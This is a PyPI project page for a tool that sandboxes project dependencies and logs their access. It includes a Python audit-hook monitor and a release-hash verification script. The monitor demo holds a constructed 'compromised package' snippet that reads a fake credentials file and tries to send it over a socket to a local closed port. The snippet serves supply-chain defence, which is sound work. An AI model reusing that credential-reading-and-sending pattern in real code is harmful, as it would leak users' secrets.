Simulate supply chain attacks on your dependencies - see the blast radius before attackers do
Project description
dependency-fire-drill
Simulate supply chain attacks on your dependencies. See exactly what a compromised package can access.
What is this?
dependency-fire-drill is a security auditing CLI that sandboxes your project dependencies and logs their file system, network, and environment access attempts. It generates actionable "blast radius" reports showing the real attack surface of your dependency tree, so you can understand and mitigate supply chain risk before one of those dependencies is compromised.
Features
- Sandboxed execution – Isolates each dependency in a monitored runtime environment
- Comprehensive access logging – Tracks file system reads/writes, network connections, and environment variable access
- Multi-language support – Audits npm (JavaScript) and PyPI (Python) dependencies
- Blast radius reports – JSON and human-readable output showing attack surface per dependency
- CI/CD ready – GitHub Actions integration and machine-parseable output formats
- Zero-trust inspection – No assumptions; test what dependencies actually do, not what they claim
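The features above describe one loop: run the dependency under a monitor, record what it touches, score the pattern. The block below is an added example written for this page, not dependency-fire-drill's own code, showing that loop in miniature with CPython's sys.addaudithook (Python 3.8+). The "compromised" dependency source, the credentials file it reads and the risk heuristic are all constructed for the example; the audit event names (open, socket.connect, subprocess.Popen, os.putenv) are CPython's own. An audit hook only observes; it is not an isolation boundary, so real untrusted packages belong in a disposable VM or container.

```python
"""Added example (not dependency-fire-drill's code): a miniature blast-radius
monitor on CPython audit hooks. A constructed stand-in for a compromised
dependency runs with the hook armed; every file open, network connect,
subprocess spawn and environment write is logged and a coarse risk level
is derived. Hooks observe, they do not isolate."""
import os
import socket       # pre-imported so the dependency's own imports add no noise
import subprocess
import sys
import tempfile
from collections import defaultdict

# CPython audit events attributed to the dependency, grouped by category.
WATCHED = {
    "open": "filesystem",
    "socket.connect": "network",
    "socket.getaddrinfo": "network",
    "subprocess.Popen": "process",
    "os.system": "process",
    "os.putenv": "environment",
    "os.unsetenv": "environment",
}

# Constructed "compromised package": plants an env marker, reads a credentials
# file, spawns a process and tries to phone home to a closed local port.
# SECRET_PATH is substituted with a real temp path before execution.
DEPENDENCY_SRC = '''
import os, socket, subprocess, sys
os.environ["FIRE_DRILL_MARKER"] = "pwned"
with open(SECRET_PATH) as f:
    creds = f.read()
subprocess.run([sys.executable, "-c", "pass"], check=False)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
try:
    s.connect(("127.0.0.1", 9))      # exfiltration attempt; port 9 is closed locally
    s.sendall(creds.encode())
except OSError:
    pass
finally:
    s.close()
'''


def _render(args):
    """Flatten event args to one string without calls that raise audit events."""
    parts = []
    for a in args:
        if isinstance(a, bytes):
            parts.append(a.decode("utf-8", "replace"))   # os.putenv passes bytes on POSIX
        else:
            parts.append(a if isinstance(a, str) else repr(a))
    return " ".join(parts)


class AccessLog:
    """Audit-hook sink. Hooks cannot be removed once added, so the `active`
    flag is what scopes the log to the dependency's execution window."""

    def __init__(self):
        self.active = False
        self.events = defaultdict(list)   # category -> [(event name, rendered args)]

    def __call__(self, event, args):
        if not self.active or event not in WATCHED:
            return
        if event == "socket.connect":
            args = args[1:]                # drop the socket object, keep the address
        self.events[WATCHED[event]].append((event, _render(args)))


MONITOR = AccessLog()
sys.addaudithook(MONITOR)


def run_under_monitor(source, monitor=MONITOR):
    """Execute dependency source with the hook armed; returns category -> events.
    (A real tool would import the installed package rather than exec a string.)"""
    monitor.events = defaultdict(list)
    code = compile(source, "<dependency>", "exec")
    monitor.active = True
    try:
        exec(code, {"__name__": "dependency"})
    finally:
        monitor.active = False
    return monitor.events


def risk_level(events):
    """Constructed heuristic, not the tool's scoring: touching local state or
    spawning processes *and* reaching the network is the exfil/dropper shape."""
    touched = {category for category, items in events.items() if items}
    if not touched:
        return "none"
    if "network" in touched and touched & {"filesystem", "environment", "process"}:
        return "high"
    if touched & {"network", "process"}:
        return "medium"
    return "low"


def demo():
    """Run the constructed scenario; returns (events, risk, secret_path)."""
    workdir = tempfile.mkdtemp(prefix="fire-drill-")
    secret_path = os.path.join(workdir, "aws_credentials")   # constructed, not real
    with open(secret_path, "w") as f:
        f.write("[default]\naws_access_key_id = AKIAEXAMPLE\n")
    events = run_under_monitor(DEPENDENCY_SRC.replace("SECRET_PATH", repr(secret_path)))
    os.environ.pop("FIRE_DRILL_MARKER", None)     # undo the marker the dependency set
    return events, risk_level(events), secret_path


if __name__ == "__main__":
    events, risk, _ = demo()
    for category, items in sorted(events.items()):
        for name, rendered in items:
            print(f"[{category}] {name}: {rendered}")
    print("risk level:", risk)
```

Running the block prints one line per recorded access and the derived risk level. The hook stays installed for the life of the interpreter, which is why logging is gated on the active flag and why the hook body avoids any call (such as formatting a socket object) that could raise an audit event of its own.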
Quick Start
Installation
pip install dependency-fire-drill
Basic Usage
# Audit a Node.js project
dependency-fire-drill audit --package-json ./package.json --output report.json
# Audit a Python project
dependency-fire-drill audit --requirements ./requirements.txt --output report.json
# View a formatted report
dependency-fire-drill report --input report.json --format human
CI/CD Integration
Add to your GitHub Actions workflow:
- name: Run dependency fire drill
  uses: your-org/dependency-fire-drill@v1
  with:
    package-file: package.json
    fail-on-high: true
Usage Examples
Audit a project with the default settings:
dependency-fire-drill audit --package-json package.json
Generate a report with risk scoring:
dependency-fire-drill audit --package-json package.json \
--sandbox-timeout 30 \
--output blast-radius.json
Export for security dashboard:
dependency-fire-drill report --input blast-radius.json \
--format json \
--include-graph
The output includes:
- Per-dependency access logs (files, network IPs, env vars)
- Risk scores based on access patterns
- Dependency graph showing transitive risks
- Actionable recommendations
Tech Stack
- Language: Python 3.9+
- Sandboxing: OS-level process isolation with syscall monitoring
- Parsing: npm/PyPI manifest readers
- Output: JSON, human-readable text, CI integrations
License
MIT
Download files
File details
Details for the file dependency_fire_drill-0.1.0.tar.gz.
File metadata
- Download URL: dependency_fire_drill-0.1.0.tar.gz
- Upload date:
- Size: 13.0 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.9.25
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | 9bb486782541b7516218d3f89dae5c2742dac64803e6f1d4e983a21d3688cd6d |
| MD5 | 584802bdbe962b2bc17d2ad76a1a4641 |
| BLAKE2b-256 | c4c0e7dbd8977e6a20bbd9cb16012b52a7705f09406b3bbd6d1e91a63c495860 |
File details
Details for the file dependency_fire_drill-0.1.0-py3-none-any.whl.
File metadata
- Download URL: dependency_fire_drill-0.1.0-py3-none-any.whl
- Upload date:
- Size: 13.1 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.9.25
File hashes
| Algorithm | Hash digest |
|---|---|
| SHA256 | c76372dd0e37c22d148736fd47a9d7b33a51d3a88dab5c12894c483ae63b561b |
| MD5 | e53c3f17a46cc8b93a426284b00bb836 |
| BLAKE2b-256 | 31b411156778483ff080d043f2d2cec6f2631f20c9fef8817076a46ccbef8c6f |
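Both release files above were uploaded with an API token rather than Trusted Publishing, so the listing carries no publisher attestation; the SHA256 digests are the integrity anchor you have. The block below is an added example, not part of the package: it streams a downloaded artifact through SHA-256, compares it with the published digest in constant time, and emits the hash-pinned requirement line that makes pip refuse any other bytes. The digests are copied from the two tables above; write_sample_file exists only for the self-check and writes constructed content.

```python
"""Added example, not dependency-fire-drill's code: verify a downloaded release
file against the SHA256 digests published on its PyPI page and produce a
hash-pinned requirement line for `pip install --require-hashes`."""
import hashlib
import hmac
import os
import tempfile

# SHA256 digests copied from the File hashes tables for version 0.1.0.
PUBLISHED_SHA256 = {
    "dependency_fire_drill-0.1.0.tar.gz":
        "9bb486782541b7516218d3f89dae5c2742dac64803e6f1d4e983a21d3688cd6d",
    "dependency_fire_drill-0.1.0-py3-none-any.whl":
        "c76372dd0e37c22d148736fd47a9d7b33a51d3a88dab5c12894c483ae63b561b",
}


def sha256_file(path, chunk_size=1 << 16):
    """Stream the file through SHA-256 so large wheels never need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path, expected_sha256):
    """True only if the file's digest equals the published one (constant-time compare)."""
    return hmac.compare_digest(sha256_file(path), expected_sha256.lower())


def pinned_requirement(name, version, sha256_digests):
    """One requirements.txt line pinning the version and every acceptable digest;
    pip accepts several --hash options so both the sdist and the wheel can be allowed."""
    hashes = " ".join(f"--hash=sha256:{d}" for d in sorted(sha256_digests))
    return f"{name}=={version} {hashes}"


def write_sample_file(content=b""):
    """Self-check helper: writes constructed bytes to a temp file, returns its path."""
    fd, path = tempfile.mkstemp(prefix="fire-drill-artifact-")
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return path


if __name__ == "__main__":
    import sys
    # Usage: python verify_release.py <downloaded file> [...]
    for path in sys.argv[1:]:
        expected = PUBLISHED_SHA256.get(os.path.basename(path))
        if expected is None:
            print(f"{path}: no published digest for this filename")
            continue
        print(f"{path}: {'OK' if verify_artifact(path, expected) else 'MISMATCH - do not install'}")
    print(pinned_requirement("dependency-fire-drill", "0.1.0", PUBLISHED_SHA256.values()))
```

Fetch the artifact without installing it (pip download --no-deps dependency-fire-drill==0.1.0), run the script on the downloaded file, then place the emitted line in a requirements file and install with pip install --require-hashes -r requirements.txt; with that flag pip rejects any package that lacks a pinned hash or whose digest differs from the pinned one.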